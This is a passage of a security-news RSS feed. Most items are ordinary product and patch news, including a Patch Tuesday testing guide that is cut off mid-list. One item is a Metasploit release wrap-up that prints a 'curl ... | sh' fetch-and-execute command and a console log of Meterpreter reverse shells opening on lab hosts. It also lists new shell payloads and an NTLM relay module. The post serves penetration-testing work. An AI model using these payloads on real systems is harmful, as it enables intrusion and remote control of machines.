understanding unlocks simple video edits so you can ask Omni to tweak the video you have to get the video you need. | <a href="https://workspaceupdates.googleblog.com/2026/07/generate-higher-quality-ai-video-clips-and-edit-any-video-with-Gemini-Omni-in-Vids.html" target="_blank">Learn more</a>.</p><h3>Cast yourself in AI video clips using your personal avatar with Gemini Omni in Vids</h3><p>Users now have access to Gemini Omni directly within Google Vids. With Gemini Omni, you can create videos using your personal avatar to scale your presence without the studio time. Use a secure verification process to capture your likeness and then select it as a character in Omni generations within Vids. | <a href="https://workspaceupdates.googleblog.com/2026/07/cast-yourself-in-ai-video-clips-using-your-personal-avatar-with-Gemini-Omni-in-Vids.html" target="_blank">Learn more</a>.</p><h3>New Google Meet 'Take notes for me' settings for admins and end users</h3><p>To help users remember to capture notes for meetings when it’s most valuable, we’re updating the admin and end user settings that let them pre-configure AI note-taking for Google Meet. | <a href="https://workspaceupdates.googleblog.com/2026/07/new-google-meet-take-notes-for-me-settings-for-admins-and-end-users.html" target="_blank">Learn more</a>.</p><p><span>The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[M. Thénardier, LastPass, GitHub, EBS, Spirals, Pegasus, Shaft, Josh Marpet, and More - SWN #599]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 M. Thénardier, LastPass, GitHub, EBS, Spirals, Pegasus, Shaft, Josh Marpet, and More on this episode of the Security Weekly News.

Visit https://www.securityweekly.com/swn for all the latest episodes!

Show Notes: https://security...]]></description>
<link>https://tsecurity.de/de/3677040/it-security-video/m-thnardier-lastpass-github-ebs-spirals-pegasus-shaft-josh-marpet-and-more-swn-599/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677040/it-security-video/m-thnardier-lastpass-github-ebs-spirals-pegasus-shaft-josh-marpet-and-more-swn-599/</guid>
<pubDate>Fri, 17 Jul 2026 23:03:14 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Jh5qmJUi_KQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>M. Thénardier, LastPass, GitHub, EBS, Spirals, Pegasus, Shaft, Josh Marpet, and More on this episode of the Security Weekly News.<br />
<br />
Visit https://www.securityweekly.com/swn for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/swn-599<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap Up: An HTTP to SMB relay plus Payload Improvements]]></title>
<description><![CDATA[Metasploit Wrap Up HousekeepingWhile the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of so...]]></description>
<link>https://tsecurity.de/de/3676924/it-security-nachrichten/metasploit-wrap-up-an-http-to-smb-relay-plus-payload-improvements/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676924/it-security-nachrichten/metasploit-wrap-up-an-http-to-smb-relay-plus-payload-improvements/</guid>
<pubDate>Fri, 17 Jul 2026 21:52:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Metasploit Wrap Up Housekeeping</h2><p>While the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of some of the more exciting content. Stay tuned for the next generation of Metasploit Wrap Ups and be sure to subscribe to the <a href="https://www.rapid7.com/blog/tag/metasploit/rss/">RSS Feed</a> to be alerted when new blogs are released.</p><h2>Fetch Multi: Just Fetch and Forget?</h2><p>Our very own <a href="https://github.com/bwatters-r7">bwatters-r7</a> continued to enhance our Fetch Payloads implementation. This time adding a new Linux Fetch Multi payload family that supports on-the-fly Linux architecture identification. Standard Fetch payloads produce a command that will download and execute a specific binary payload on a target, but the new Linux Fetch Multi family will report the architecture of the target host when it requests the payload, and the handler will automatically serve the correct elf architecture payload for the given target. It means that if a user is exploiting a Linux host, they do not need to guess the target’s architecture when selecting a payload. It also means that one payload and one handler can serve across multiple targets of differing architectures. Since these payloads work by adding a query string, only HTTP and HTTPS-based fetch payloads support Fetch Multi payloads.</p><p>Here is an example of the same payload and handler identifying and delivering the proper elf architecture payloads to a mipsel host, a mips64 host, and an aarch64 host by just executing the command <span data-type="inlineCode">curl -s http://10.5.135.210:8080/x|sh</span> on each target.</p><p></p><pre>msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; show options
Module options (payload/cmd/linux/http/multi/meterpreter_reverse_tcp):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP,
                                               WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous
                                              handles, requires Linux ≥3.17 (for Python variant also Python ≥3
                                              .8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+
                                              , shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH   x                no        Local URI to use for serving payload
   LHOST           10.5.135.210     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port
   When FETCH_COMMAND is one of CURL,GET,WGET:
   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  true             yes       Host both the binary payload and the command so it can be piped dire
                                          ctly to the shell.
   When FETCH_FILELESS is none:
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      cldOGvRDplZ      no        Name to use on remote system when storing payload; cannot co
                                                  ntain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
View the full module info with the info, or info -d command.
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; to_handler
[*] Command to execute on target: curl -s http://10.5.135.210:8080/x|sh
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 10.5.135.210:8080
[*] HTTP server started
[*] Adding resource /csmCra8lnQTHxFXkipQC0w
[*] Adding resource /x
[*] Started reverse TCP handler on 10.5.135.210:4444 
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; [*] Client 10.5.132.212 requested /x
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Client 10.5.132.212 requested /csmCra8lnQTHxFXkipQC0w?arch=armv7l
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for armle arch
[*] Meterpreter session 1 opened (10.5.135.210:4444 -&gt; 10.5.132.212:45068) at 2026-07-14 11:33:18 -0500
[*] Client 10.5.132.214 requested /x
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Client 10.5.132.214 requested /csmCra8lnQTHxFXkipQC0w?arch=aarch64
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for aarch64 arch
[*] Meterpreter session 2 opened (10.5.135.210:4444 -&gt; 10.5.132.214:39894) at 2026-07-14 11:33:26 -0500
[*] Client 10.5.132.224 requested /x
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /csmCra8lnQTHxFXkipQC0w?arch=mips64
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Dynamic Payload Detected, expecting a Query String in the request...
[*] Building payload for mips64 arch
[*] Meterpreter session 3 opened (10.5.135.210:4444 -&gt; 10.5.132.224:53506) at 2026-07-14 11:33:41 -0500
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; sessions -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.5.132.212)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 2 (10.5.132.214)
Computer     : kali-raspberrypi
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : cmd/linux
[*] Running 'sysinfo' on meterpreter session 3 (10.5.132.224)
Computer     : ubnt
OS           : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : cmd/linux
msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt;</pre><h2>RISC architecture is going to change everything!</h2><p>Speaking of juggling multiple architectures, <a href="https://github.com/bcoles">bcoles</a> added support for yet another IoT arch: RiscV. The change adds staged and stageless shell payloads for both 32- and 64-bit RiscV systems, and dovetails well with his other PR adding XOR encoders for RiscV payloads.</p><h2>New module content (4)</h2><h3>Microsoft Windows HTTP to SMB Relay</h3><p>Author: jheysel-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21620">#21620</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: server/relay/http_to_smb</p><p>Description: Adds an HTTP to SMB Relay server module allowing users to relay an incoming NTLM HTTP authentication request to multiple SMB servers in order to establish SMB session on the target hosts to be used by the framework.</p><h3>Byte XORi Encoder</h3><p>Author: bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Encoder</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: riscv32le/byte_xori</p><p>Description: Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</p><h3>FTP, HTTP, HTTPS and METERPRETER_REVERSE_TCP Fetch, Linux Chmod</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Adapter)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a></p><p>Description: Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</p><p>This adapter adds 421 new payloads for all Linux and Windows architectures including:</p><ul><li>cmd/linux/ftp/aarch64/chmod</li><li>cmd/linux/ftp/x86/meterpreter/reverse_tcp</li><li>cmd/windows/ftp/aarch64/meterpreter_reverse_http</li></ul><h3>FTP Fetch, Linux dup2 Command Shell, Bind TCP Stager</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:bcoles@gmail.com">bcoles@gmail.com</a></p><p>Type: Payload (Stager)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21237">#21237</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Description: Adds reverse_tcp and bind_tcp stagers and a shell command stage for both RISC-V 64-bit and 32-bit little-endian Linux targets.</p><ul><li>cmd/linux/ftp/riscv32le/shell/bind_tcp</li><li>cmd/linux/http/riscv32le/shell/bind_tcp</li><li>cmd/linux/https/riscv32le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv32le/shell/bind_tcp</li><li>linux/riscv32le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv32le/shell/reverse_tcp</li><li>cmd/linux/http/riscv32le/shell/reverse_tcp</li><li>cmd/linux/https/riscv32le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv32le/shell/reverse_tcp</li><li>linux/riscv32le/shell/reverse_tcp</li><li>cmd/linux/ftp/riscv64le/shell/bind_tcp</li><li>cmd/linux/http/riscv64le/shell/bind_tcp</li><li>cmd/linux/https/riscv64le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv64le/shell/bind_tcp</li><li>linux/riscv64le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv64le/shell/reverse_tcp</li><li>cmd/linux/http/riscv64le/shell/reverse_tcp</li><li>cmd/linux/https/riscv64le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv64le/shell/reverse_tcp</li><li>linux/riscv64le/shell/reverse_tcp</li></ul><h2>Enhancements and features (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> from <a href="https://github.com/bcoles">bcoles</a> - Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21599">#21599</a> from <a href="https://github.com/Pushpenderrathore">Pushpenderrathore</a> - This extends CertificateTrace functionality to also surface the server's TLS peer certificate when an HTTP module connects over HTTPS. This makes use of the same CertificateTrace enum (off/metadata/full) operators are already familiar with.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21602">#21602</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates the Windows service PE template to use an injected segment instead of the old substitution method.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21621">#21621</a> from <a href="https://github.com/eipoverflow">eipoverflow</a> - This fix a limitation on running fileless staged Meterpreter in recent OSX versions.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21670">#21670</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Marks the dynamic XOR encoders as unable to preserve registers and adds regression coverage for stage encoding when a preserved register is required.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21675">#21675</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Fix search_cache job cache generation by skipping multi arch payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21677">#21677</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Fixes a bug in the HTTP relay server mixin where requests matching the module's URIPATH were silently dropped instead of being relayed The fix removes the now-unnecessary URIPATH option, ensures all requests are properly relayed, and adds spec tests to cover the fix.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-07-08T13%3A32%3A18-07%3A00..2026-07-15T15%3A48%3A48-07%3A00%22">Pull Requests 6.4.143...6.4.144</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.143...6.4.144">Full diff 6.4.143...6.4.144</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacStories Weekly: Issue 522]]></title>
<description><![CDATA[This week, in addition to the usual links, app debuts, and recap of MacStories' articles and podcasts:Combining Codex with Reminders, Email, and Notion, by JohnPursuing Meta-Style Glasses is a Poor Strategy for Apple, by JonathanPublic Betas, Dictation Apps, and More, by Jonathan
	
						This Sto...]]></description>
<link>https://tsecurity.de/de/3676814/ios-mac-os/macstories-weekly-issue-522/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676814/ios-mac-os/macstories-weekly-issue-522/</guid>
<pubDate>Fri, 17 Jul 2026 20:23:46 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<nav class="ms-issue-toc"><p>This week, in addition to the usual links, app debuts, and recap of MacStories' articles and podcasts:</p><ul><li><a href="https://www.macstories.net/club/macstories-weekly-issue-522/#combining-codex-with-reminders-email-and-notion" class="ms-issue-toc-item">Combining Codex with Reminders, Email, and Notion, by John</a></li><li><a href="https://www.macstories.net/club/macstories-weekly-issue-522/#pursuing-meta-style-glasses-is-a-poor-strategy-for-apple" class="ms-issue-toc-item">Pursuing Meta-Style Glasses is a Poor Strategy for Apple, by Jonathan</a></li><li><a href="https://www.macstories.net/club/macstories-weekly-issue-522/#public-betas-dictation-apps-and-more" class="ms-issue-toc-item">Public Betas, Dictation Apps, and More, by Jonathan</a></li></ul></nav>
	<div class="club-notice-restricted plan-">
						<h2>This Story is for Club Members</h2>

				<p>Get weekly newsletters, exclusive stories, member downloads, and ad-free version of MacStories Unwind.</p>
				<p><br><a href="https://www.macstories.net/plans?utm_source=ms&amp;utm_medium=web" class="button">See Plans</a></p>

									 

					<p>Already a member? <a href="https://www.macstories.net/?memberful_endpoint=auth">Sign in</a></p>
								</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[July’s Patch Tuesday sees an end-of-support collision amidst a massive, record-setting patch wave]]></title>
<description><![CDATA[Microsoft addressed 722 CVEs this month once the 427 Chromium upstream relays are set aside — roughly three times a normal cycle and one of the largest single months in recent memory. Two vulnerabilities arrive under active exploitation: an elevation of privilege in Active Directory Federation Se...]]></description>
<link>https://tsecurity.de/de/3676568/it-nachrichten/julys-patch-tuesday-sees-an-end-of-support-collision-amidst-a-massive-record-setting-patch-wave/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676568/it-nachrichten/julys-patch-tuesday-sees-an-end-of-support-collision-amidst-a-massive-record-setting-patch-wave/</guid>
<pubDate>Fri, 17 Jul 2026 18:08:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft addressed 722 CVEs this month once the 427 Chromium upstream relays are set aside — roughly three times a normal cycle and one of the largest single months in recent memory. Two vulnerabilities arrive under active exploitation: an elevation of privilege in <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview">Active Directory Federation Services</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56155">CVE-2026-56155</a>), and an elevation of privilege in <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> Server (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>). A third, a <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a> security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>) is publicly disclosed but not yet exploited.</p>



<p class="wp-block-paragraph">The <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July 2026 Patch Tuesday</a> earns Patch Now recommendations for Windows, Office, Exchange, and SQL Server. SharePoint has two critical RCEs on top of its exploited zero-day, and Exchange Server returns with a critical on-premises spoofing flaw. Adding to our (dear) administrator’s efforts, SharePoint Server 2016/2019 and SQL Server 2016 all reach end of support today. The Readiness team has provided a handy <a href="https://applicationreadiness.com/perspectives/assurance-security-dashboard-july-2026-patch-tuesday/">infographic</a> of the expected risk profile of this month’s Patch Tuesday updates.</p>



<h2 class="wp-block-heading">Known issues</h2>



<p class="wp-block-paragraph">The <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July release note</a> flags known issues against the following updates:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a> recovery prompt on first restart – the PCR7 recovery condition tracked since April remains live on the platforms that did not receive the Boot Manager servicing fix (Windows Server 2022 and Windows 10 22H2). Devices with BitLocker on the OS drive, the Group Policy “Configure TPM platform validation profile for native UEFI firmware configurations” set with PCR7 included, and <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/system-security/trusted-boot">Secure Boot</a> State PCR7 Binding reported as “Not Possible” may be prompted for the recovery key on the first restart after installing this update. This month’s publicly disclosed BitLocker security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>) keeps the component in focus.</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">WSUS</a> synchronization error details suppressed (Windows Server 2025 and 2022) – WSUS no longer displays synchronization error details in its error reporting, a deliberate change made to address the Remote Code Execution Vulnerability <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287">CVE-2025-59287</a>. Sync still works, but administrators triaging a failed synchronization lose the detail pane and must fall back to the SoftwareDistribution logs.</li>
</ul>



<p class="wp-block-paragraph">Windows Update can still replace manually installed graphics drivers with older OEM versions from the catalogue (the four-part Hardware ID ranking issue acknowledged on the <a href="https://techcommunity.microsoft.com/blog/hardware-dev-center/updated-graphics-driver-publishing-policy-from-4-part-to-2-part-hwid--chid-targe/4519070">Hardware Dev Center</a>). The two-part HWID pilot runs to September 2026.</p>



<h2 class="wp-block-heading">Major revisions and mitigations</h2>



<p class="wp-block-paragraph">Between the June and July Patch Tuesdays, MSRC Security Update Guide notices updated 651 reported CVEs across six notification dates (15, 19, 26 June and 3, 8, 11 July), 532 of them routine Chromium upstream re-publications. Of the roughly 30 Microsoft revisions, almost all were cross-platform Office catch-up with no bearing on a Windows enterprise estate. No further action required for IT administrators for this Windows update cycle.</p>



<h2 class="wp-block-heading">Windows lifecycle and enforcement updates</h2>



<p class="wp-block-paragraph">This is the deadline cycle June pointed at. The July end-of-support wave lands today, and it collides with the month’s heaviest patching. <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> and <a href="https://learn.microsoft.com/en-us/sql/sql-server/what-is-sql-server?view=sql-server-ver17">SQL Server</a> take some of their most active security updates ever on platforms receiving their last.</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/lifecycle/products/sharepoint-server-2016">SharePoint Server 2016</a> and <a href="https://learn.microsoft.com/en-us/lifecycle/products/sharepoint-server-2019">2019</a>, <a href="https://learn.microsoft.com/en-us/lifecycle/products/project-server-2016">Project Server 2016</a> and 2019, <a href="https://learn.microsoft.com/en-us/lifecycle/products/sql-server-2016">SQL Server 2016</a> and InfoPath 2013 have all reached end of support. SQL Server 2014 ESU Year 2 reaches end of support today. SharePoint 2016/2019 take an actively exploited zero-day and two RCEs this cycle, and SQL Server 2016 takes a critical RCE, all as their final security update. Now is the time to get moving on updating these platforms.</li>
</ul>



<p class="wp-block-paragraph">The 2011 Secure Boot certificate expiries have now passed; devices that never took the Windows UEFI CA 2023 key updates under <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24932">CVE-2023-24932</a> can no longer receive updated boot components, with the Windows Production PCA for the boot manager still ahead on 19 October 2026. <a href="https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview">Kerberos</a> RC4 hardening (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20833">CVE-2026-20833</a>) has been in enforcement since April 2026; the July 2026 update removes the RC4DefaultDisablementPhase rollback control that let administrators defer it, making enforcement final.</p>



<p class="wp-block-paragraph">Microsoft’s <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July 2026 Patch Tuesday</a> is a security-only release: 180 test-guidance entries, 14 of them high risk (June had one). Printing and graphics are the centre of gravity: win32kfull.sys, the kernel-mode window manager, is the most-patched binary (14 entries), and seven high-risk flags sit alongside it – the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components">Print Spooler</a>, four win32k entries, and two <a href="https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-gdi-start">GDI+</a> metafile entries. <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview">NTFS</a> is the second theme, with 10 entries, two high risk. Every entry reports no functional changes – it’s pure regression validation. The packages span Windows 11 26H1 back to Server 2012 ESU.</p>



<h2 class="wp-block-heading">Printing and graphics (high risk)</h2>



<p class="wp-block-paragraph">The Print Spooler flag centres on shared printers, whose queue status must track jobs accurately; the win32k flags cover 32-bit application printing, font rendering in printed and exported output, on-screen rendering, and window management; the GDI+ flags cover metafiles.</p>



<ul class="wp-block-list">
<li>Share a printer from a print server, print from a separate client in varied sizes and formats, and cancel a job, confirming the queue reflects every state change</li>



<li>Print from your 32-bit applications, and print text-heavy, graphics-heavy, and multi-page documents to physical and virtual (PDF or XPS) printers, repeating after orientation, scaling, and resolution changes</li>



<li>Export documents with varied fonts to PDF and confirm fonts and layout survive; render EMF+ files that apply effects to very large images, and convert EMF files to WMF</li>



<li>Open and close windows rapidly, drive common dialogs by mouse and keyboard, and close parents with children open – no orphaned windows</li>
</ul>



<h2 class="wp-block-heading">Storage and file systems (high risk)</h2>



<p class="wp-block-paragraph">Both NTFS high-risk flags target integrity – extended attributes, and volume recovery after an unexpected shutdown. File History carries its own high-risk flag on clients. A Windows Server 2025-only bundle across boot, <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a>, and <a href="https://learn.microsoft.com/en-us/windows-server/storage/refs/refs-overview">ReFS</a> demands the full Secure Boot/BitLocker matrix. Eight entries hit Server 2025 alone, including WSL, GPU partitioning, and a scripted Windows Server Backup pass repeating recovery after rolling the date 90 days forward.</p>



<ul class="wp-block-list">
<li>Exercise NTFS extended attributes – older-system EAs, backup workflows that preserve them, concurrent same-file operations where supported – with antivirus, encryption, or storage filters active</li>



<li>Simulate an unexpected shutdown during file activity, verify the volume mounts intact, run chkdsk, and confirm indexing, shadow copies, and backup still work</li>



<li>Run a full File History pass: back up, modify and back up again, exclude folders, change frequency, move the destination</li>



<li>On Server 2025, boot all four Secure Boot/BitLocker combinations, in standard and confidential VMs where supported</li>
</ul>



<h2 class="wp-block-heading">Devices, input and networking (high risk)</h2>



<p class="wp-block-paragraph">Three further high-risk flags land here: HID input (hidparse.sys with win32k) – touch, keyboard, mouse, touchpad, through disconnects and restarts; the WinSock bundle (afd.sys plus Bluetooth and multicast drivers); and IrDA. The heaviest ask is not high risk at all: the NetAdapterCx driver (24H2/25H2, Server 2025) wants 500-plus adapter enable-disable cycles under Driver Verifier.</p>



<ul class="wp-block-list">
<li>Run the connectivity suite: browsing, large downloads, mapped drives, an RDP session idle 30+ minutes, a Teams call, an hour of streaming, and localhost apps such as Docker or WSL</li>



<li>Stress Bluetooth: pairing, 10+ minutes of audio, input after idle, and reconnection after sleep</li>



<li>Where infrared hardware exists, transfer a file and run at least 100 connect-disconnect cycles</li>



<li>Sweep the rest: DNS Server (zone data must stay under its configured database directory), the client resolver (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top">DHCP</a> Server (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview">SMB</a>, <a href="https://learn.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview">NFS</a>, Message Queuing (five entries), <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-access/remote-access">RRAS</a> administration, client VPN, and WinHTTP/WinINet consumers</li>
</ul>



<h2 class="wp-block-heading">Other windows components</h2>



<p class="wp-block-paragraph">Windows Installer itself is patched: testing should include application install, uninstall, repair, and force a rollback. <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/hyper-v-on-windows-server">Hyper-V</a> wants virtual-switch traffic as part of its testing exercises with Virtual Filtering Platform policies enforced. Sixteen media-related security entries cover playback, HEVC and MPEG-TS, USB audio, and MIDI 2.0.</p>



<h2 class="wp-block-heading">Shell hardening and LSA isolation</h2>



<p class="wp-block-paragraph">These two entries are a little different from the rest of the cycle: they ask you to confirm a security behaviour actively works, not just that nothing regressed. A pass here means the protection fired, so treat them as functional checks rather than box-ticking.</p>



<ul class="wp-block-list">
<li>Shortcut handling (windows.storage.dll; Windows 11 23H2 and earlier, plus Server 2022): drop a shortcut file carrying the <a href="https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked">Mark of the Web</a> into a folder and confirm the system refuses to extract its icon and leaks no <a href="https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview">NTLM</a> credential hash – include the zero-click paths, where the icon would otherwise render without you opening anything</li>



<li>LSA isolation and KeyGuard (24H2/25H2, Server 2025): run the supplied PowerShell validation script, which turns on <a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">Virtualization-based Security</a> if it isn’t already, exercises KeyGuard key operations in both required and best-effort isolation modes, and reports pass or fail – it needs TPM 2.0, UEFI with Secure Boot disabled, and PowerShell 7</li>



<li>Run that script on a dedicated test machine, never a shared one: it enables test signing, disables automatic updates, and reboots without asking</li>
</ul>



<h2 class="wp-block-heading">Office &amp; SharePoint</h2>



<p class="wp-block-paragraph">July’s <a href="https://learn.microsoft.com/en-us/office/">Office</a> wave is security-only; everything landed on 14 July, and nothing critical or non-security shipped in the 7 July preview. It’s an MSI-only cycle, so <a href="https://learn.microsoft.com/en-us/deployoffice/overview-office-deployment-tool">Click-to-Run</a> estates can sit this one out.</p>



<ul class="wp-block-list">
